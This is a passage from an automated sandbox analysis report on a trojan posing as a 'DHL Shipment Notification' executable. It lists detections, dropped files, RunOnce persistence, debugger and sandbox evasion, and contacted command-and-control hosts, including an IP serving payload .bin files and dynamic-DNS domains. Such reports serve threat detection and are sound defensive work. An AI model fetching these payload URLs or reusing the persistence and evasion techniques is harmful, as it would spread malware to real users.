unknown 15->38 40 178.32.63.50, 49719, 49747, 49749 OVHFR France 15->40 32 C:\Users\user\Driftigt\Rotacism6.exe, PE32 15->32 dropped 34 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 15->34 dropped 42 Tries to detect Any.run 15->42 44 Hides threads from debuggers 15->44 46 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->46 26 conhost.exe 15->26         started        28 conhost.exe 20->28         started        30 conhost.exe 24->30         started        file8 signatures9 process10

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe29%VirustotalBrowse
        nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe13%ReversingLabsWin32.Trojan.Mucc

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\Driftigt\Rotacism6.exe13%ReversingLabsWin32.Trojan.Mucc

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://178.32.63.50/boss/nancata_RbkGW109.bin0%Avira URL Cloudsafe
        http://178.32.63.50/moss/nancata_RbkGW109.bin%0%Avira URL Cloudsafe
        http://178.32.63.50/moss/nancata_RbkGW109.binhttp://178.32.63.50/boss/nancata_RbkGW109.binwininet.dl0%Avira URL Cloudsafe
        septnan.duckdns.org0%Avira URL Cloudsafe
        http://178.32.63.50/moss/nancata_RbkGW109.bino0%Avira URL Cloudsafe
        http://178.32.63.50/moss/nancata_RbkGW109.bin0%Avira URL Cloudsafe
        asynno.ddns.net0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        septnan.duckdns.org
        193.104.197.28
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          septnan.duckdns.orgtrue
          • Avira URL Cloud: safe
          unknown
          http://178.32.63.50/moss/nancata_RbkGW109.bintrue
          • Avira URL Cloud: safe
          unknown
          asynno.ddns.nettrue
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://178.32.63.50/boss/nancata_RbkGW109.binRegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://178.32.63.50/moss/nancata_RbkGW109.bin%RegAsm.exe, 00000023.00000002.1748382157.0000000000EBF000.00000004.00000020.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://178.32.63.50/moss/nancata_RbkGW109.binhttp://178.32.63.50/boss/nancata_RbkGW109.binwininet.dlRegAsm.exe, 00000023.00000002.1747941860.0000000000E60000.00000004.00000001.sdmp, RegAsm.exe, 00000025.00000002.1819910008.0000000000EF0000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://178.32.63.50/moss/nancata_RbkGW109.binoRegAsm.exe, 00000013.00000003.1470016480.0000000000CC1000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          193.104.197.28
          septnan.duckdns.orgunknown
          1299TELIANETTeliaCarrierEUtrue
          178.32.63.50
          unknownFrance
          16276OVHFRtrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:1361
          Start date:27.09.2021
          Start time:13:05:15
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 14m 22s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name:Suspected Instruction Hammering
          Number of analysed new started processes analysed:43
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.troj.evad.winEXE@14/7@77/2
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 95%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          Show All
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • TCP Packets have been reduced to 100
          • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, BdeUISrv.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, UsoClient.exe, HxTsr.exe, SgrmBroker.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.82.19.171, 51.105.236.244, 40.117.96.136, 204.79.197.200, 13.107.21.200, 13.107.5.88, 20.82.210.154, 40.112.88.60, 20.199.120.182, 40.125.122.176, 52.109.12.18, 52.152.108.96, 40.125.122.151, 52.242.97.97, 52.184.216.246, 209.197.3.8, 104.89.85.192, 20.73.194.208, 20.190.160.8, 20.190.160.67, 20.190.160.71, 20.190.160.73, 20.190.160.6, 20.190.160.69, 20.190.160.136, 20.190.160.4, 51.124.78.146
          • Excluded domains from analysis (whitelisted): geover.prod.do.dsp.mp.microsoft.com, geo.prod.do.dsp.trafficmanager.net, slscr.update.microsoft.com, e10370.g.akamaiedge.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, wns.notify.trafficmanager.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, geover.prod.do.dsp.mp.microsoft.com.edgekey.net, slscr.update.microsoft.com.akadns.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, geo.prod.do.dsp.mp.microsoft.com, dual-a-0001.a-msedge.net, sls.update.microsoft.com.akadns.net, array506.prod.do.dsp.mp.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          13:09:17API Interceptor4134x Sleep call for process: RegAsm.exe modified
          13:09:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Digressionernes8 C:\Users\user\Driftigt\Rotacism6.exe
          13:09:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Digressionernes8 C:\Users\user\Driftigt\Rotacism6.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          193.104.197.28DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeGet hashmaliciousBrowse
            178.32.63.50DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeGet hashmaliciousBrowse
            • 178.32.63.50/moss/Host_AKhLBP62.bin
            Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exeGet hashmaliciousBrowse
            • 178.32.63.50/mt/nansept_YbjxsPwq12.bin
            nSOA_Statement-of-Account_desk-of-account-receivable-june-august-2021-cummulative.exeGet hashmaliciousBrowse
            • 178.32.63.50/ma/Host_wfKdFDKfLU89.bin

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            OVHFRDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeGet hashmaliciousBrowse
            • 178.32.63.50
            Lrs8NGx6VM.exeGet hashmaliciousBrowse
            • 164.132.171.176
            Claim-838392655-09242021.xlsGet hashmaliciousBrowse
            • 51.89.115.111
            2PzMc3x4WP.exeGet hashmaliciousBrowse
            • 87.98.153.120
            e5jVcbuCo5.exeGet hashmaliciousBrowse
            • 176.31.32.199
            i7qUJCnMz0.exeGet hashmaliciousBrowse
            • 176.31.32.199
            zsChlwJrkj.exeGet hashmaliciousBrowse
            • 176.31.32.199
            claim.xlsGet hashmaliciousBrowse
            • 51.89.115.111
            9uHCz7MrjF.exeGet hashmaliciousBrowse
            • 176.31.32.199
            J1IYv644YS.exeGet hashmaliciousBrowse
            • 51.254.69.209
            b3astmode.arm7Get hashmaliciousBrowse
            • 37.187.28.233
            J7SOJRlEly.exeGet hashmaliciousBrowse
            • 51.91.193.179
            SE6Hlp3GfE.exeGet hashmaliciousBrowse
            • 176.31.32.199
            TxIlr8dCCJ.exeGet hashmaliciousBrowse
            • 176.31.32.199
            xZqtlgwoWq.exeGet hashmaliciousBrowse
            • 176.31.32.199
            XwfWWIkABj.exeGet hashmaliciousBrowse
            • 51.254.84.37
            w86r2qGEjf.exeGet hashmaliciousBrowse
            • 176.31.32.199
            xd.arm7Get hashmaliciousBrowse
            • 164.133.71.222
            HYmN4qwdBc.exeGet hashmaliciousBrowse
            • 51.91.236.193
            gXH3oSVmWj.exeGet hashmaliciousBrowse
            • 176.31.32.199
            TELIANETTeliaCarrierEUDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeGet hashmaliciousBrowse
            • 193.104.197.28
            0HXxUcP5S4Get hashmaliciousBrowse
            • 217.212.229.228
            S7wQtTgZBFGet hashmaliciousBrowse
            • 104.123.190.203
            rod3gmxCHKGet hashmaliciousBrowse
            • 178.76.5.162
            i686Get hashmaliciousBrowse
            • 178.76.5.180
            Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exeGet hashmaliciousBrowse
            • 193.104.197.30
            1JFod4taFmGet hashmaliciousBrowse
            • 193.45.0.22
            ofgE8wetW4Get hashmaliciousBrowse
            • 213.155.150.24
            jew.x86Get hashmaliciousBrowse
            • 80.239.196.190
            vigmCKdmz9Get hashmaliciousBrowse
            • 178.78.11.99
            tohlIdtsnNGet hashmaliciousBrowse
            • 62.115.122.3
            YQqx8LTbmFGet hashmaliciousBrowse
            • 62.115.122.8
            DbGr5tUs3NGet hashmaliciousBrowse
            • 193.45.0.10
            sora.x86Get hashmaliciousBrowse
            • 80.239.148.228
            HsQg5UkrWYGet hashmaliciousBrowse
            • 209.170.88.177
            HtxD2FSo8oGet hashmaliciousBrowse
            • 178.76.30.223
            JMn71TLrESGet hashmaliciousBrowse
            • 217.212.230.150
            frKG4b8C9cGet hashmaliciousBrowse
            • 62.115.56.113
            NVwuK32YYUGet hashmaliciousBrowse
            • 23.52.153.3
            E8BpDKVKq3Get hashmaliciousBrowse
            • 80.239.196.196

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):484
            Entropy (8bit):5.329823438649177
            Encrypted:false
            SSDEEP:12:Q3LaJU2kf0U29sEi1B0U2uk6CSbyU1k7t92PLI4M6:MLF2kN29sEi52GXAqI4j
            MD5:A7D638357AC3EA35CAC71DC69C51F1CA
            SHA1:DFEECB467265C051F5975C22339F244D54974D20
            SHA-256:64521E5F83E22B93A14C312AD6C20304F2F8815E414F902120D3D96B39DBD295
            SHA-512:7F58508A45654779EF3AECAC6CB2329DFC83203AF38D8AECA6DE41082549AA8B18A20DE94B5DA67E8FCFBEF42BE81216EDF0EAF44E6380C2BF91C7E5656F0A73
            Malicious:false
            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dll",0..2,"Microsoft.VisualBasic, Version=8.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
            C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\catalog.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:data
            Category:dropped
            Size (bytes):1160
            Entropy (8bit):7.024371743172393
            Encrypted:false
            SSDEEP:24:IQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtvd7xCFhwUuQnybgCUtd:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/a
            MD5:786E4F1138F3E30FB67C690E55AC5A4F
            SHA1:828C2B627BCB54053173B54C3A4C289EF3476641
            SHA-256:D953043AE0955AA739AF97A60DAC7541048D83FC7601365A861A527E59DBFA38
            SHA-512:5FA075AB5626579DFE5A96E5B6DABF60DC3DDBA8A6E5ADEF0538032E8FB000772C7DCB73D315B208A04125F014ACCB92FAA194108D4C76443B9FB7B97719FF26
            Malicious:false
            Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
            C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\run.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:Non-ISO extended-ASCII text, with no line terminators
            Category:dropped
            Size (bytes):8
            Entropy (8bit):3.0
            Encrypted:false
            SSDEEP:3:WRtn:WRtn
            MD5:A51D3561BEEBB810D78B0F10EA53D563
            SHA1:0AB7E0C95C9925918E51BCA768318CF176F979DB
            SHA-256:7213B8E769B964123CAD592A80F0B112F6E498A636D62E33C1C69E1A460DB803
            SHA-512:654ED30AFAAD82485D12A47790D927661182080A7811BEC52A38ED801255CE5F013D3A1A9AAF70C5A47EC7A38E9EF7422848EA31F11F318AF08E304EAD63C24D
            Malicious:true
            Preview: .$q....H
            C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\settings.bak
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:data
            Category:dropped
            Size (bytes):24
            Entropy (8bit):4.501629167387823
            Encrypted:false
            SSDEEP:3:9bzY6oRDIvYk:RzWDI3
            MD5:ACD3FB4310417DC77FE06F15B0E353E6
            SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
            SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
            SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
            Malicious:false
            Preview: 9iH...}Z.4..f..J".C;"a
            C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\settings.bin
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):5.320159765557392
            Encrypted:false
            SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
            MD5:BB0F9B9992809E733EFFF8B0E562CFD6
            SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
            SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
            SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
            Malicious:false
            Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
            C:\Users\user\AppData\Roaming\11389406-0377-47ED-98C7-D564E683C6EB\storage.dat
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:data
            Category:dropped
            Size (bytes):426840
            Entropy (8bit):7.999608491116724
            Encrypted:true
            SSDEEP:12288:zKf137EiDsTjevgA4p0V7njXuWSvdVU7V4OC0Rr:+134i2lp67i5d8+OCg
            MD5:963D5E2C9C0008DFF05518B47C367A7F
            SHA1:C183D601FABBC9AC8FBFA0A0937DECC677535E74
            SHA-256:5EACF2974C9BB2C2E24CDC651C4840DD6F4B76A98F0E85E90279F1DBB2E6F3C0
            SHA-512:0C04E1C1A13070D48728D9F7F300D9B26DEC6EC8875D8D3017EAD52B9EE5BDF9B651A7F0FCC537761212831107646ED72B8ED017E7477E600BC0137EF857AE2C
            Malicious:false
            Preview: ..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h*...J4*...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.*h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H........*...OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........*X...b*Z...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..
            C:\Users\user\Driftigt\Rotacism6.exe
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):94208
            Entropy (8bit):5.7049263215720325
            Encrypted:false
            SSDEEP:768:L/nxsMCmcp1FaKWg49kg8cf3hVFwal+HZL+J0d937yH38o5pjZ4vLJTX8HjlF8uj:znxUH49NNf3hMDkeyX8qpjZc9oX8M
            MD5:CD65994E4F53363527E3651759103759
            SHA1:241DDA06961D323299C19C1F558168864867169E
            SHA-256:634115D5EB91226011678443A96617CB0BCC1831621B418A0E16860B79502DE7
            SHA-512:077473C0B90B1F41F2775A144909CA6C4EDD1C1A03DF92ECE1DE2637124D5E3ED903BB6073E81E486906FE2B00B472F2DA75E40D5DDCFEBE2DFD016D3D2D1583
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 13%
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.uM.ek.RM.RichSM.................PE..L......S.................@...@...............P....@.................................x.......................................4B..(...........................................................................0... ....................................text....6.......@.................. ..`.data...\ ...P.......P..............@....rsrc................`..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):5.7049263215720325
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.15%
            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
            File size:94208
            MD5:cd65994e4f53363527e3651759103759
            SHA1:241dda06961d323299c19c1f558168864867169e
            SHA256:634115d5eb91226011678443a96617cb0bcc1831621b418a0e16860b79502de7
            SHA512:077473c0b90b1f41f2775a144909ca6c4edd1c1a03df92ece1de2637124d5e3ed903bb6073e81e486906fe2b00b472f2da75e40d5ddcfebe2dfd016d3d2d1583
            SSDEEP:768:L/nxsMCmcp1FaKWg49kg8cf3hVFwal+HZL+J0d937yH38o5pjZ4vLJTX8HjlF8uj:znxUH49NNf3hMDkeyX8qpjZc9oX8M
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..uM..ek..RM..RichSM..................PE..L......S.................@...@...............P....@........

            File Icon

            Icon Hash:20047c7c70f0e004

            Static PE Info

            General

            Entrypoint:0x4012f0
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            DLL Characteristics:
            Time Stamp:0x53BB158E [Mon Jul 7 21:47:58 2014 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:508f324e8f3f3b33e0170cdca30d1edb

            Entrypoint Preview

            Instruction
            push 00401E10h
            call 00007FB138595BE5h
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            xor byte ptr [eax], al
            add byte ptr [eax], al
            inc eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], ch
            mov ebp, AB2B62B7h
            pop esi
            dec edi
            mov dword ptr [ebx], ebx
            jc 00007FB138595C49h
            sub dh, ch
            dec edi
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add dword ptr [eax], eax
            add byte ptr [eax], al
            add byte ptr [eax], al
            add al, 00h
            add byte ptr [eax], al
            inc edx
            inc ecx
            inc ebx
            dec ecx
            dec esp
            dec esp
            dec ecx
            inc edi
            inc ebp
            dec esi
            dec ecx
            inc ebx
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            dec esp
            xor dword ptr [eax], eax
            add eax, 043F122Dh
            ror byte ptr [01BD4FC1h], 00000015h
            add dword ptr [ecx-02h], A71CC384h
            mov cl, 82h
            fdivp st(2), st(0)
            jmp far B6EEh : 2E39B447h
            rcr dword ptr [ebp-52B0C5C8h], 33h
            cdq
            iretw
            adc dword ptr [edi+00AA000Ch], esi
            pushad
            rcl dword ptr [ebx+00000000h], cl
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            add byte ptr [eax], al
            aas
            add dword ptr [eax], eax
            add byte ptr [ebx+00h], bl
            add byte ptr [eax], al
            add byte ptr [49525000h], dl
            dec esi
            push esp
            inc ebp
            push edx
            push esp
            dec ecx
            dec esp
            push ebx
            dec esp
            push ebp
            push esp
            dec esi
            dec ecx
            dec esi
            inc edi
            inc ebp

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x142340x28.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x8f4.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x20
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x104.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x136d00x14000False0.483056640625data6.11514265963IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .data0x150000x205c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
            .rsrc0x180000x8f40x1000False0.1708984375data1.95064287814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_ICON0x187c40x130data
            RT_ICON0x184dc0x2e8data
            RT_ICON0x183b40x128GLS_BINARY_LSB_FIRST
            RT_GROUP_ICON0x183840x30data
            RT_VERSION0x181500x234dataChineseTaiwan

            Imports

            DLLImport
            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

            Version Infos

            DescriptionData
            Translation0x0404 0x04b0
            InternalNameMESALLIANCER
            FileVersion1.00
            CompanyNameSeismic
            ProductNameHULKORTSOPERATRS
            ProductVersion1.00
            OriginalFilenameMESALLIANCER.exe

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            ChineseTaiwan

            Network Behavior

            Snort IDS Alerts

            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            09/27/21-13:09:17.991836TCP2018752ET TROJAN Generic .bin download from Dotted Quad4971980192.168.11.20178.32.63.50
            09/27/21-13:09:20.137820UDP254DNS SPOOF query response with TTL of 1 min. and no authority53627408.8.8.8192.168.11.20
